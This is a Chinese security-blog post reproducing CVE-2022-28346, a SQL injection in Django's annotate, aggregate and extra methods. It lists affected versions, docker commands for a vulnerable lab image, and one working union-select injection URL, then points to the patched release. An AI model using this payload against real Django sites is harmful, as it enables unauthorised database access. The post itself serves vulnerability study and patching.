CVE-2022-28346:Django SQL注入漏洞

admin 2025年1月11日14:01:48评论15 views字数 781阅读2分36秒阅读模式
上方蓝色字体关注我们,一起学安全!
作者:韭菜@Timeline Sec
本文字数:710
阅读时长:2~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介

Django 是用 Python 开发的一个免费开源的 Web 框架,几乎囊括了 Web 应用的方方面面,可以用于快速搭建高性能、优雅的网站,Django 提供了许多网站后台开发经常用到的模块,使开发者能够专注于业务部分。

0x02 漏洞概述
漏洞编号:CVE-2022-28346
攻击者使用精心编制的字典, 通过**kwargs传递给QuerySet.annotate()、aggregate()和extra()这些方法,可导致这些方法在列别名中受到SQL注入攻击。
0x03 影响版本
4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28
0x04 环境搭建
docker pull s0cke3t/cve-2022-28346:latestdocker run -d -p 8080:8000  s0cke3t/cve-2022-28346
0x05 漏洞复现

通过报错页面可以发现存在哪些接口

CVE-2022-28346:Django SQL注入漏洞

访问接口如果存在传参,同样会提示报错信息

CVE-2022-28346:Django SQL注入漏洞

使用报错提示的参数进行sql注入

http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --

CVE-2022-28346:Django SQL注入漏洞
0x06 修复方式
官方已发布安全版本,下载地址:
https://www.djangoproject.com/download/
CVE-2022-28346:Django SQL注入漏洞
CVE-2022-28346:Django SQL注入漏洞
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行

原文始发于微信公众号(Timeline Sec):CVE-2022-28346:Django SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日14:01:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-28346:Django SQL注入漏洞https://cn-sec.com/archives/1157417.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息